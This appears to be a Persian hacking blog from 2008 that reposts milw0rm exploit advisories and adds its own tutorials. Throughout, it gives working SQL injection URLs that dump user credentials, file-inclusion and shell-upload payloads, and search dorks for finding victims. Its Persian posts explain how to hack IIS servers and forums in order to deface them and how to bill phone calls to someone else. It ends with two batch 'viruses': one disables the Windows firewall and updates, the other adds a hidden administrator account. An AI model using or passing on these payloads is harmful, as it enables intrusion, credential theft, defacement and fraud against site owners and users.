# Home : www.no-back.org
# Script : Blog PixelMotion
# Bug : Remote File Upload Vulnerability
# Download : http://www.pixelmotion.org/zip/blog.zip
=========================JIkI Team===================
# Exploit :
uploa your shell
http://[Site]/[script]/admin/modif_config.php
http://[Site]/[script]/templateZip/[shell]
###################OR################
upload your shell compressed by Zip forme
http://[Site]/[script]/admin/modif_config.php
after upload your shell go to
http://[Site]/[script]/templates/[shell]
because your sheel has extract at templates
and has upload at templateZip
=========================JIKI Team===================
greetz : all my friend and H-T Team
-------------------------------------------------------------------------
-- JIKI Team [ JIKO + KIl1er ] --
-------------------------------------------------------------------------
# milw0rm.com [2008-04-06]
| +| نوشته شده توسط
محمد در دوشنبه نوزدهم فروردین 1387
| |
| | | |
|
|
|
|
--==+================================================================================+==--
--==+ Prozilla Forum Service SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 7 April 2008
Script Download: http://prozilla.com
DORK: N/A
Vendor Has Not Been Notified!
DESCRIPTION:
Prozilla Forum Service is vulnerable due to a insecure mysql query, this allows the remote attacker
to pull user credentials from the database, and possibly load a shell using OUTFILE. and
even read local files using load_file()
SQL Injection:
http://site.com/forum.php?forum=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(name,0x3a,password),3,4/**/FROM/**/users/*
NOTE/TIP:
admin login is at /siteadmin/
admin login can be found in config.php which can be viewed by using load_file().
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
--==+================================================================================+==--
--==+ Prozilla Forum Service SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
# milw0rm.com [2008-04-06]
| +| نوشته شده توسط
محمد در دوشنبه نوزدهم فروردین 1387
| |
| | | |
|
|
|
|
###################################################################################
# #
# MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability #
# #
# found by: Lidloses_Auge #
# Contact (ICQ): 120946783 #
# Greetz to: free-hack.com #
# #
###############################################################################################################################################
# #
# Vulnerability: #
# #
# Document: pages.php #
# GET-Parameter: page #
# #
# Dork: #
# #
# inurl:"pages.php" + intext:"powered by mybb" #
# #
# Example: #
# #
# http://[target]/pages.php?page='union/**/select/**/1,unhex(hex(concat_ws(0x202d20,username,password))),3,4,5,6,7/**/FROM/**/mybb_users/* #
# #
# Notes: #
# #
# Successrate depends on the permissions which could be set for viewing the 'page' #
# #
###############################################################################################################################################
# milw0rm.com [2008-04-06]
| +| نوشته شده توسط
محمد در یکشنبه هجدهم فروردین 1387
| |
| | | |
|
|
|
|
سلام دوستان عزیز راستش خودم بدجوری دنبال این بودم
گفتم که شایدم که یکی مثل من باشه -> پس گفتم که بزارمش بچه ها استفاده کنن -> امیدوارم خوشتون بیاد
برای هک کردن موبایل کسی باید گوشی اون رو یک بار به دستتون بگیرید و شماره تلفن خودتون رو به صورت زیر بگیرید.مثلا اگر شماره شما :: ۰۹۱۷۷۸۲۵۰۱۰ بود شما باید به صورت :
*۰۹۱۷۷۸۲۵۰۱۰ بگیرید یعنی جولوش یک ستاره بگذارید.و وقتی شما ره گرفته شد کافیه گوشیتونو بردارید تا ارتباط برقرار شود.خب حالا در واقع میتونیم بگیم که گوشی قربانی هک شد.و مرحله حساس این است که بدونیم چه جوری میشه بقیه کارو انجام داد.حالا ما در این حالت میتونیم ۳ تا کار رو آنجام بدبیم.در قسمت زیر به اون سه کار اشاره شده، د میزنم واین آموزش سه کاری است که در ادامه ترفند بالا بر روی گوشی قربانی قابل اجرا است:
۱:عدد ۲۳ رو شماره گیری کنید و بعد از شنیدن بوق آزاد شماره بگیرید و پول رو به حساب ..........۲:فقط کافیست بعد هک کردن گوشی دکمه * ( ستاره ) رو فشار بدید و خط قربانی رو کنترل کنید.۳:عدد ۶۷۶۷۵۴۳۲ رو شماره گیری کنید وok یا همان دکمه اتصال را فشار دهید بعد با پیغامی رو به رو میشوید که میگه ارتباط قطع شد یعنی گوشی سوخت.
کلیه این روشها امتحان شده هستند پس سعی کنید حتالمقدور در مورد گوشی ههای ارزان قیمت امتحان کنین که ضرر مالی زیادی گریبان گیر شما نشود!
تلفن زدن با موبایل اماااااااا به حساب دیگری:
شما ميتونيد با مبايلتون هر چندتا خواستيد تلفن بزنيد و هزينه ها را به حساب يه نفر ديگه بزاريد خیلی با حال نه؟ براي اينكار بايد يه كارهايي انجام بدين به اين صورت : اول مبايل اون شخصي را كه مي خواهيد هزينه ها را بپردازد بر داريد و شماره اي را كه ميخواهيد هزينه اش برداشته بشه را بگيريد البته قبلش يك + يا 90+ اضافه كنيد مثلاْ به اين صورت :09133107777+ كه در نتيجه ديگه هزينه به صورت حساب اين شماره اضافه نميشه و همش ميره به حساب كسي كه شما اين شماره را با مبايلش گرفتيد البته اين كار با دزدي فرقي نداره اما صد در صد جواب ميده و خود مخابرات هم اعلام كرده که همچنان راهي براي اين مشكل پيدا نكردن ! پس از امرو موبایلتون رو دست همه کس ندین !
این روش هم مانند روش بالا کاملا امتحان شده!
در این روش هر وقت فیش مو بایلتون از حد معمول بیشتر شد برید و پرینت اونو از مخابرات بخواین و وقتی پرینت رو گرفتین ببینین قسمت (بدهکار) و (بستانکار) موبایلتون با هم برابره یا نه اگه با هم برابر نبود مصبب اونو حلال کنینا که اون دنیا دیگه نمک گیرتون نشه
منبع:http://behzadhacker.blogfa.com
| +| نوشته شده توسط
محمد در یکشنبه هجدهم فروردین 1387
| |
| | | |
|
|
|
|
--==+ Entertainment Directory <= 1.1 SQL Injection Vulnerbility +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz & xprog
Discovered On: 5 April 2008
Script Download: http://www.turnkeyzone.com
DORK: N/A
Vendor Has Not Been Notified!
DESCRIPTION:
Entertainment directory is vulnerable due to a insecure mysql query. this allows the remote attacker
to obtain user credentials from the database.
EXPLOITS:
http://site.com/directory.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,CONCAT(username,char(58),password),9,10,11,12,13,14/**/FROM/**/users/*
NOTE/TIP:
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew!
--==+================================================================================+==--
--==+ Entertainment Directory <= 1.1 SQL Injection Vulnerbility +==--
--==+================================================================================+==--
# milw0rm.com [2008-04-05]
| +| نوشته شده توسط
محمد در یکشنبه هجدهم فروردین 1387
| |
| | | |
|
|
|
|
########################################################################
# #
# ...:::::Blogator-script 0.95 SQL Injection Vulnerbility ::::.... #
########################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
--------
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----------------------------------
dork: inurl:/_blogadata/
-----------------------------------
vuln code in /_blogadata/include/sond_result.php:
line 27: $id_art=$_GET['id_art'];
......
line 34: $sql_res=mysql_query("SELECT sond_rep, votes_H, votes_F FROM sondage_rep WHERE id_sond = $id_art ORDER BY ordre");
------------
vuln:
http://www.site.com/_blogadata/include/sond_result.php?id_art=-99999/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/where/**/id_membre=1/*
--------------------------------
you can see in Blogator-script other injection bugs too ;)
# milw0rm.com [2008-04-04]
| +| نوشته شده توسط
محمد در شنبه هفدهم فروردین 1387
| |
| | | |
|
|
|
|
برای استفاده از این باگ ها مثلا در یک قسمت نوشته allinurl: "index.php?mod=galerie"action=gal باید به سایت گوگل رفته و آن عبارت را در کادر متن جستجو paste می کنیم و بعدا دکمه جستجو را می زنیم در این قسمت تعدادی سایت ژیدا شده است که ما یکی از آنها را باز می کنیم و در قسمت آدرس تا گزینه index.php را پاک کرده و به جای از EXPLOiT ها استفاده می کنیم یعنی اکسژلویت آن را به جای آدرس های پاک شده paste می کنیم
| +| نوشته شده توسط
محمد در پنجشنبه پانزدهم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# KwsPHP v1.3.456 (galerie)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?mod=galerie"action=gal
#
###########################################
EXPLOiT :
index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pass),4,5,6,7/**/from/**/users/*
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-04-03]
| +| نوشته شده توسط
محمد در پنجشنبه پانزدهم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# KwsPHP v1.3.456 (archives)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?mod=archives"
#
###########################################
EXPLOiT 1:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11,12,13/**/from/**/users/*
EXPLOiT 2:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10/**/from/**/users/*
EXPLOiT 3:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11,12,13,14/**/from/**/users/*
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-04-03]
| +| نوشته شده توسط
محمد در پنجشنبه پانزدهم فروردین 1387
| |
| | | |
|
|
|
|
cript Name : PHP Block a8.4
Download : http://sourceforge.net/project/downloading.php?group_id=186381&use_mirror=surfnet&filename=a8.4.zip&73507325
Error : include_once $PATH_TO_CODE."/script/fonction.php";
Vul Code : http://[site]/[Path]/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=http://[ShellCode]
Greetz : Kezzap66345 - Str0ke - Dread 35
# milw0rm.com [2008-04-02]
| +| نوشته شده توسط
محمد در پنجشنبه پانزدهم فروردین 1387
| |
| | | |
|
|
|
|
/==============================================================================================================\
| |
| [o] Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability |
| |
| Software : com_onlineflashquiz version 1.0.2 - paid component |
| Developer : www.elearningforce.biz |
| Author : NoGe |
| Contact : noge[dot]code[at]gmail[dot]com |
| |
|==============================================================================================================|
| |
| [o] Vulnerable file |
| |
| component/com_onlineflashquiz/quiz/common/db_config.inc.php |
| |
| include_once($base_dir."common/classes/DBBase.class.php"); |
| |
| |
| |
| [o] Exploit |
| |
| http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[evilcode] |
| |
|==============================================================================================================|
| |
| [o] Greetz |
| |
| all crew #papuahacker #baliemhackerlink #nyubicrew |
| skulmatic olibekas ulga Cungkee nyubi k1tk4t str0ke |
| yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ SiKodoQ |
| http://kapukvalley.net member |
| |
\==============================================================================================================/
# milw0rm.com [2008-04-02]
| +| نوشته شده توسط
محمد در پنجشنبه پانزدهم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# Powered by Smoothflash SQL injection
# Powered by Newartonline
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : "Powered by Smoothflash"
#
# DORK 2 : allinurl: "admin_view_image.php"
#
###########################################
EXPLOiT :
admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users
admin login on frontpage
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
# milw0rm.com [2008-03-30]
| +| نوشته شده توسط
محمد در دوشنبه دوازدهم فروردین 1387
| |
| | | |
|
|
|
|
[~] KISGB (Keep It Simple Guest Book) : Local FiLe Include's (tmp_theme)
[~]
[~] Version : All Versions
[~]
[~] Download : http://sourceforge.net/project/showfiles.php?group_id=38585
[~] ----------------------------------------------------------
[~] Exploit coded and founded by Cr@zy_King
[~]
[~] Date: 30.03.2008
[~]
[~]
[~] crazy_kinq@hotmail.co.uk
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Digital-AngeLs Bug Researchers Yakinda OnLine :) Loading.
[~]
[~] [Peace Crew] Kerem125 - Alemin_Krali - m0sted - UyussMan
[~]
[~] Eno7 | Crackers_Child | Ghost61 | str0ke | [Hx] | [03xTr] | The_Bekir
[~]----------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/view_private.php?start=252&action=edit&tmp_theme=LFI
[~]
[~] ../../../../../../etc/passwd
[~]
[~]
[~]---------------------------------------------------------------------------------------------------------------
[~] " Aklın Dünya Limanına Demir Atmışsa Gemin Fırtınadan Kurtulmaz ."
# milw0rm.com [2008-03-30]
| +| نوشته شده توسط
محمد در دوشنبه دوازدهم فروردین 1387
| |
| | | |
|
|
|
|
###############################################################
#
# Wordpress Plugin Download file Remote SQL Injection Vulnerability
#
###############################################################
#
# Author: BL4CK
#
# Mail: bl4ck00@gmail.com
#
################################################################
#
# Dork: inurl:"wp-download.php?dl_id="
#
################################################################
Example:
http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]
SQL:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*
################################################################
# Greetz: ZioN, b!g B0$$, h4cky0u.org
################################################################
# milw0rm.com [2008-03-31]
| +| نوشته شده توسط
محمد در دوشنبه دوازدهم فروردین 1387
| |
| | | |
|
|
|
|
e107 My_Gallery Plugin Arbitrary File Download Vulnerability
Release Date: 2008-03-25
Critical: Moderately critical
Impact: Exposure of system information, Exposure of sensitive information
Where: From remote
Solution Status: Unpatched
Software: My_Gallery v2.3 (plugin for e107)
Link: http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.208
Description:
A photo gallery for e107, powered by Highslide JS script. with random
gallery menu and navigation menu.
+ User interface for uploads images
+ Pre-moderation users download
+ Control Panel, can edit the name and description, delete and move
+ New comment system, it is now the most opulent gallery
+ New Front page
+ Added BBcode and a button
Vulnerability:
Jerome Athias has discovered a vulnerability in My_Gallery plugin for
e107, which can be exploited by malicious people to disclose sensitive
information.
The vulnerability is caused due to an input validation error in
dload.php when processing arguments passed to the "file" parameter. This
can be exploited to download arbitrary files from the affected system.
The vulnerability is confirmed in version 2.3. Other versions may also
be affected.
Solution:
Edit the source code to ensure that input is properly validated.
Dork: inurl:"e107_plugins/my_gallery"
Provided and/or discovered by:
Jerome Athias, JA-PSI
http://www.ja-psi.fr
Other References:
https://www.securinfos.info
------------------------------------------------------------------
PoC:
http://target.com/e107_plugins/my_gallery/dload.php?file=dload.php
File is downloaded as a .jpg file but the PHP source code can be
retrieved using a text editor.
# milw0rm.com [2008-03-25]
| +| نوشته شده توسط
محمد در چهارشنبه هفتم فروردین 1387
| |
| | | |
|
|
|
|
##########################################
#
# [ Joomla Component com_alphacontent SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Contact: c02[at]hotmail.de
[~] Website: http://www.dzw0rm.ch
[~] Greetings: to all hackers DZ
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'AlphaContent'
[~] Version() : '2.5.8 '
###########################################
#
# DORK 1 : inurl: "com_alphacontent"
#
# DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"
#
###########################################
[+]Exploit :
index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
###########################################
[+] : you can see the password in 'Title'
###########################################
side note:
alphacontent
25 Jul 2007
Bernard Gilly
This component is released under the GNU/GPL License.
contact@visualclinic.fr
www.visualclinic.fr
2.5.8
Directory component with alphabetical indexes for Joomla's Content
alphacontent
16 Sept 2006
Bernard Gilly
This component is released under the GNU/GPL License.
contact@visualclinic.fr
www.visualclinic.fr
2.5.4
Directory component and alphabetical indexes for Mambo/Joomla's Content
# milw0rm.com [2008-03-25
| +| نوشته شده توسط
محمد در چهارشنبه هفتم فروردین 1387
| |
| | | |
|
|
|
|
HIS-Webshop is a shopping-system written in Perl by www.shoppark.de
The script doesn´t check the "t"-parameter.
Example:
http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00
<< Greetz Zero X >>
# milw0rm.com [2008-03-24]
| +| نوشته شده توسط
محمد در سه شنبه ششم فروردین 1387
| |
| | | |
|
|
|
|
Affected software
-----------------
ircu (upto and including 2.10.12.12)
snircd (upto and including 1.3.4)
and many other ircu derivatives
Vulnerability details
---------------------
send_user_mode in s_user.c does not check that the argument after a +r mode
is present, if it is not than the NULL sentinel may be missed, causing the
function to iterate over the boundary of the array.
One possible exploit:
/mode nickname i i i i i i i i i i i i i i i r r r r s
This won't work if there's another NULL directly after the first from the
previous parsed command, if this is the case one can just append more modes
or send some other junk to the ircd.
Resolution
----------
Upgrade to the very latest version of ircu/snircd.
Disclosure timeline
-------------------
2008-03-15: Vulnerability discovered by QuakeNet and reported to Undernet.
2008-03-15: Patches released.
2008-03-17: Patches applied to public servers.
2008-03-24: Public disclosure.
--
Chris Porter (slug on QuakeNet)
http://www.warp13.co.uk
# milw0rm.com [2008-03-24]
| +| نوشته شده توسط
محمد در سه شنبه ششم فروردین 1387
| |
| | | |
|
|
|
|
یه باگ جدید دیگه
##########################################
#
# Joomla Component com_cinema SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "com_cinema"
#
###########################################
EXPLOiT 1 :
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*
EXPLOiT 2 :
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/*
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
side note:
Cinema
25.03.2006
Vamba & Luscarpa
Copyright 2006 by Vamba & Luscarpa.
http://www.gnu.org/copyleft/gpl.html GNU/GPL
webmaster@joomlaitalia.com - webmaster@webagain.net
www.joomlaitalia.com - www.webagain.net
1.0
Componente Cinema per organizzare la tua videoteca. Componente realizzato sulla base di Akogallery
# milw0rm.com [2008-03-23]
| +| نوشته شده توسط
محمد در دوشنبه پنجم فروردین 1387
| |
| | | |
|
|
|
|
این یه باگ جدید دیگه از joomla
##########################################
#
# Powered by Download 3000
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : "Powered by Download 3000"
#
# DORK 2 : allinurl: "com_d3000"
#
###########################################
EXPLOiT :
index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*
###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
side note:
D3000
Csaba Kissi
April 2006
(C) 2006 Open Source Matters. All rights reserved.
http://www.gnu.org/copyleft/gpl.html GNU/GPL
info@download3000.com
joomla.download3000.com
1.0.0
to your Joomla powered site within one minute. The best of all is the fact that you can earn money through the
RegNow affiliate program. The component is optimized for Googlebot and Inktomi slurp so you'll get more visitors from search engines.
For more information about usage and your affiliate ID activation please read the help file in the package.
Please send us your suggestions, comments and future requests for the Download3000 component. Thank you in advance.]]>
# milw0rm.com [2008-03-23]
| +| نوشته شده توسط
محمد در دوشنبه پنجم فروردین 1387
| |
| | | |
|
|
|
|
@ Joomla component rekry!Joom (op_id) <=1.0.0 SQL injectIon.
Author:Sniper456
Contact:Sniper456[attt]gmail.com
Greetss: My chilean people
Developer:Matti Kiviharju
**Bug:
http://www.target.com/index.php?option=com_rekry&Itemid=xX&rekryview=view&op_id=[SQL]
**Example
http://www.target.com/index.php?option=com_rekry&Itemid=60&rekryview=view&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--
# Fro000M CHILE my frieeeenD! 2008 # /* Grande colo colo */
side note:
rekry
18.07.2006
Matti Kiviharju
Copyright 2006 by Matti Kiviharju. All rights reserved!
info@teknologiaplaneetta.com
www.teknologiaplaneetta.com
1.0.0
This component allows careers to send their career info to databese!
# milw0rm.com [2008-03-23]
| +| نوشته شده توسط
محمد در دوشنبه پنجم فروردین 1387
| |
| | | |
|
|
|
|
===MDAC-Local Command Execution=== شاید شما فکر کنید که این یک آسیب پذیری قدیمیه اما باید بگم که حدودا 30 درصد سرورهای IIS به این مشکل دچارند . کامپیونت MDAC در IIS ایرادی داره که نفودگر با اون می تونه دستوراتی رو تو سرور اجرا کنه . برای اینکه چک کنیم سایتی این آسیب پذیری رو داره اول با نت کت مثل زیر به وب سرور هدف وصل می شیم nc -nw -w 2 80
بعد که وصل شد این رو می زنیم :
GET /msadc/msadc.dll HTTP
و اگه جوابی مثل زیر اومد
application/x_varg
90% سایت این باگ رو داره .
شما برای اینکه سایت رو هک کنید باید Exploiitesh رو به نام msdac.pl و msdac2.pl از سایت www.wiretrip.net/rfp(شاید این سایت نیاد) دریافت کنید . ( شما برای اجرا این اکسپلوییت نیاز به برنامه ی اکتیو پرل دارید)
این اکسپلوییت اول سایت رو از نظر داشتن این باگ چک می کنه بعد هم می نویسه :
Please type the NT commandline you want to run (cmd /c assumed):\n
که یعنی هر دستوری خواستین بزنین بزنین !
حالا مثلا اگه می بخوایم صفحه اول سایت رو تغییر بدیم می نویسیم
cmd/c echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm
که البته این مسیر بستگی به محل نصب ویندوز داره و اگه ویندوز تو درایو C:\ نصب شده باشه اینجوری می شه :
cmd/c echo hacked by me > C:\inetpub\wwwroot\victimweb\index.htm
البته شما کارهای دیگه هم می تونید با این شل بکنید . که خودتون هم شوفرید هم راننده .
==Codebrws.asp & Showcode.asp ==
Codebrws.asp و Showcode.asp نمایش دهنده فایل در IIS هستند . که به طور خودکار نصب نشده اند.
این فایلها برای دیدن کدهای تمرینات موجود در مثال های آموزشی (Sample - ترجمه رو حال کردین ) در IIS بکار می رود . و یه هکر با هوش با استفاده از این فایلها می تونه سرور رو هک کنه.
البته این آسیب پذیری ایرادهایی هم داره مثلا :
1-Codebrws.asp & Showcode.asp به صورت پیش فرض نصب نیستند .
1-این آسیب پذیری فقط می تونه فایلها رو نمایش بده ( که البته ما هم همین رو می خوایم ) .
2- نمی تونه از WindowsNT Access Control Lists بگذره ( من نمی دونم این معنیش چیه یعنی اکسس کنترل لیست چی هست هر کی دی دونه توضیح بده . لطفا!)
3-فقط فایلهایی رو که در همون پارتیشن ( پارتیشن نصب IIS ) هست رو می تونه نشون بده .
حالا فرض می کنیم می خواین با این آسیب پذیری سورس فایل Admin.asp سایت www.victim.com رو ببینیم . اول براوزر خودتون را باز می کنیم بعد آدرس زیر رو می نویسید :
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=admin.asp
و صفا !
منبع : سایت پرشین هکرز| +| نوشته شده توسط
محمد در یکشنبه چهارم فروردین 1387
| |
| | | |
|
|
|
|
اين آموزش بر روي فرم هاي ورژن 2 و پايين تر عمل خواهد كرد در اولين قدم بايد بر روي فرم Sign Up كرده و يوزر و پسورد به همراه يك ايميل واقعي دريافت كنيد . در ادامه اميلي براي Confirm عضويت شما فرستاده ميشود . در ادامه به Member list رفته و يا به لينك زير برويد : http://URL/memberlist.phpدر ادامه ميتوانيد بر روي هر كدام از ممبر ها كليك كرده و URL را بر روي آدرس بار خود مشاهده كنيد در ادامه Tag زير را در آخر URL پيدا خواهيد كرد بدون هيچگونه quotes "userid=" اين عدد را در آخر اضافه كنيد " 1 " به عنوان مثال : http://URL/member.php?action=getinfo&userid=1در ادامه با انجام اين كار شما نام Administrator را پيدا خواهيد كزد ( يوزر ادمين سايت ) هر چيزي كه مشاهده ميكنيد يادداشت كنيد حالا همه چيز آماده شده . بصورت زير عمل كنيد : URL زير را كپي كنيد : و بصورت زير آنرا Edit كنيد : http://url/member.php?action=login&username=User&password=Sasan&url=");".$users=$DB_site->query("update+user+set+email='123456'+WHERE+username='lamer'")."Username : در اينجا يوزري كه شما در فرم با آن رجيستر كرده ايد وارد كنيد مثلا Dj_agoustinno Password : در اينجا پسورد يوزر خودتون را وارد كنيد ( Sasan ) Email Adress : در اينحا آدرس ايميلي كه با آن رجيستر كرديد وارد نماييد ( EMail@yahoo.com ) Admin : نام ادمين سايت كه بدست اورديد ( Lamer ) خوب اگه تمام كارهايي كه گفتم را درست انجام داده باشيد صفحه refresh شده و اين كار ادامه پيدا ميكند بدون توقف . خوب در اين حالت به Main Page رفته و Login كنيد با همين يوزر و پسورد ي كه الان ازشون استفاده كرديد . در اينجا صفحه اي دريافت ميكنيد كه يوزر و پسورد شما اشتباه ميباشد بر روي لينكي كه در پايين قرار گرفته و پسورد جديد براي شما ارسال ميكند كليك كرده ! و آدرس ايميلي كه پسورد براي شما ارسال شده وارد كنيد حالا به ايميل خود رفته و پسورد خود را دريافت كنيد !! اما ..... اين ....... !!! اين پسورد شما نيست پسورد ادمين سايت ميباشد J D e f a c e m e n t حالا وقت Deface كردن يا هر كاري كه شما دوست داريد رسيده !! http://URL/admin/index.phpدر اينجا Login كنيد ! اما اگر موفق نشديد به Main Page رفته و ابتدا از آنجا وارد شويد و بعد از ورود به صفحه ي ادمين رفته و دوباره Login كنيد براي Deface كردن به سمت چب نگاه كنيد "Templates" بر روي Edit كليك كرده و در قسمت راست Main Frame را ميبينيد بر روي آن Edit را بزنيد ممكنه كه بر روي Default باشد . اگر نبود اولي را انتخاب كنيد . در صفحه ي بعدي بر روي Submit كليك كنيد . به پايين آمده و Fourmhome را پيدا كرده و بر روي آن Edit را بزنيد در قسمت بعدي شما كد هاي HTML صفحه ي اول را مشاهده ميكنيد . بعد از گذاشتن كدهاي خودتون و قرار دادن آنها Submit را زده تا Index شما در صفحه ي اول به نمايش در بيايد
منبع : سایت پرشین هکرز | +| نوشته شده توسط
محمد در یکشنبه چهارم فروردین 1387
| |
| | | |
|
|
|
|
کار این ویروس از کار انداختن فایروال ویندوز است
@echo off
net stop SharedAccess
ECHO REGEDIT4 >"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess] >>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg"
ECHO. >>"%Temp%.\kill.reg"
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv] >>"%Temp%.\kill.reg"
ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg"
ECHO.>> "%Temp%.\kill.reg"
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
Exit
آن را با پسوند bat ذخیره کنید
| +| نوشته شده توسط
محمد در شنبه سوم فروردین 1387
| |
| | | |
|
|
|
|
این ویروس یک اکانت استاندارد بدون اجازه برای شما درست می کند
این ویروس را با پسوند bat ذخیره کنید
@echo off
net user ExchangeCL password /add
net localgroup administrators ExchangeCL /add
net localgroup administrateurs ExchangeCL /add
net localgroup administratoren ExchangeCL /add | | |
